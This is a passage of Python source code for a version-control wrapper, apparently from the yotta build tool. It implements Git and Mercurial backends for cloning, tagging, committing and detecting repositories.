        raise NotImplementedError()
    def markForCommit(self, path):
        """Stage *path* for the next commit.  Default: no-op."""
        pass
    def remove(self):
        """Delete the working copy from disk."""
        raise NotImplementedError()
    def __nonzero__(self):
        raise NotImplementedError()
    # python 3 truthiness
    def __bool__(self):
        return self.__nonzero__()
class Git(VCS):
    """VCS backend that shells out to the ``git`` executable."""
    def __init__(self, path):
        # path is the working tree; .git is assumed to live directly inside.
        self.worktree = path
        self.gitdir = os.path.join(path, '.git')
    @classmethod
    def cloneToTemporaryDir(cls, remote):
        return cls.cloneToDirectory(remote, tempfile.mkdtemp())
    @classmethod
    def cloneToDirectory(cls, remote, directory, tag=None):
        commands = [
            ['git', 'clone', remote, directory]
        ]
        cls._execCommands(commands)
        r = Git(directory)
        if tag is not None:
            r.updateToTag(tag)
        return r
    def fetchAllBranches(self):
        """Create a local tracking branch for every remote branch that does
        not already exist locally."""
        remote_branches = []
        local_branches = []
        # list remote branches
        out, err = self._execCommands([self._gitCmd('branch', '-r')])
        for line in out.split(b'\n'):
            branch_info = line.split(b' -> ')
            # skip HEAD:
            if len(branch_info) > 1:
                continue
            remote_branch = branch_info[0].strip()
            # strip the remote name prefix (e.g. "origin/") to get the
            # plain branch name
            branch = b'/'.join(remote_branch.split(b'/')[1:])
            remote_branches.append((remote_branch, branch))
        # list already-existing local branches
        out, err = self._execCommands([self._gitCmd('branch')])
        for line in out.split(b'\n'):
            local_branches.append(line.strip(b' *'))
        for remote, branchname in remote_branches:
            # don't try to replace existing local branches
            if branchname in local_branches:
                continue
            try:
                out, err = self._execCommands([
                    self._gitCmd('checkout', '-b', branchname, remote)
                ])
            except VCSError as e:
                git_logger.error('failed to fetch remote branch %s %s' % (remote, branchname))
                raise
    def remove(self):
        # Delete the entire working tree (including .git).
        fsutils.rmRf(self.worktree)
    def workingDirectory(self):
        return self.worktree
    def _gitCmd(self, *args):
        # Build a git invocation pinned to this worktree/gitdir; forward
        # slashes keep git happy on Windows.
        return ['git','--work-tree=%s' % self.worktree,'--git-dir=%s'%self.gitdir.replace('\\', '/')] + list(args);
    @classmethod
    def _execCommands(cls, commands):
        """Run each command in sequence; return (stdout, stderr) of the last.

        Raises VCSError on a missing executable or non-zero exit status.
        """
        out, err = None, None
        for cmd in commands:
            try:
                child = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            except OSError as e:
                if e.errno == errno.ENOENT:
                    if cmd[0] == 'git':
                        raise VCSError(
                            'git is not installed, or not in your path. Please follow the installation instructions at http://docs.yottabuild.org/#installing'
                        )
                    else:
                        raise VCSError('%s is not installed' % (cmd[0]))
                else:
                    raise VCSError('command %s failed' % (cmd))
            out, err = child.communicate()
            returncode = child.returncode
            if returncode:
                raise VCSError("command failed: %s:%s" % (cmd, err or out), returncode=returncode)
        return out, err
    def isClean(self):
        # Two diffs: worktree vs index, and index vs HEAD.  A non-zero exit
        # from either means there are uncommitted changes.
        commands = [
            self._gitCmd('diff', '--quiet', '--exit-code'),
            self._gitCmd('diff', '--cached', '--quiet', '--exit-code'),
        ]
        try:
            out, err = self._execCommands(commands)
        except VCSError as e:
            if e.returncode:
                return False
            else:
                raise
        return True
    def markForCommit(self, relative_path):
        commands = [
            self._gitCmd('add', os.path.join(self.worktree, relative_path)),
        ]
        self._execCommands(commands)
    def updateToTag(self, tag):
        commands = [
            self._gitCmd('checkout', tag),
        ]
        self._execCommands(commands)
    def tags(self):
        commands = [
            self._gitCmd('tag', '-l')
        ]
        out, err = self._execCommands(commands)
        # I think utf-8 is the right encoding? commit messages are utf-8
        # encoded, couldn't find any documentation on tag names.
        return out.decode('utf-8').split(u'\n')
    def branches(self):
        commands = [
            self._gitCmd('branch', '--list')
        ]
        out, err = self._execCommands(commands)
        # strip the "* " marker from the current branch
        return [x.lstrip(' *') for x in out.decode('utf-8').split('\n')]
    def commit(self, message, tag=None):
        commands = [
            self._gitCmd('commit', '-m', message),
        ]
        if tag:
            commands.append(
                self._gitCmd('tag', tag, '-a', '-m', tag),
            )
        self._execCommands(commands)
    def __nonzero__(self):
        return True
# FIXME: hgapi will throw HgException when something goes wrong, it may be worth trying
# to catch that in some methods
class HG(VCS):
    """VCS backend built on the hgapi library (Mercurial)."""
    def __init__(self, path):
        self.worktree = path
        self.repo = hgapi.Repo(path)
    @classmethod
    def cloneToTemporaryDir(cls, remote):
        return cls.cloneToDirectory(remote, tempfile.mkdtemp())
    @classmethod
    def cloneToDirectory(cls, remote, directory, tag=None):
        # hg doesn't automatically create the directories needed by destination
        try:
            os.makedirs(directory)
        except:
            pass
        hg_logger.debug('will clone %s into %s', remote, directory)
        hgapi.Repo.hg_clone(remote, directory)
        r = HG(directory)
        if tag is not None:
            r.updateToTag(tag)
        return r
    def remove(self):
        fsutils.rmRf(self.worktree)
    def workingDirectory(self):
        return self.worktree
    def isClean(self):
        # An empty hg status means no uncommitted changes.
        return not bool(self.repo.hg_status(empty=True))
    def markForCommit(self, relative_path):
        self.repo.hg_add(os.path.join(self.worktree, relative_path))
    def updateToTag(self, tag):
        self.repo.hg_update(tag)
    def tags(self):
        # 'tip' is an implicit pseudo-tag, not a user tag -- drop it.
        l = list(self.repo.hg_tags().keys())
        l.remove('tip')
        return l
    def commit(self, message, tag=None):
        self.repo.hg_commit(message)
        if tag:
            self.repo.hg_tag(tag)
    def __nonzero__(self):
        return True
def getVCS(path):
    """Return a VCS wrapper for *path*, or None if no checkout is detected.

    Detection is a crude marker-directory heuristic: a ``.git`` entry wins
    over an ``.hg`` directory, matching the original check order.
    """
    detectors = (
        ('.git', os.path.exists, Git),
        ('.hg', os.path.isdir, HG),
    )
    for marker, present, backend in detectors:
        if present(os.path.join(path, marker)):
            return backend(path)
    return None
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.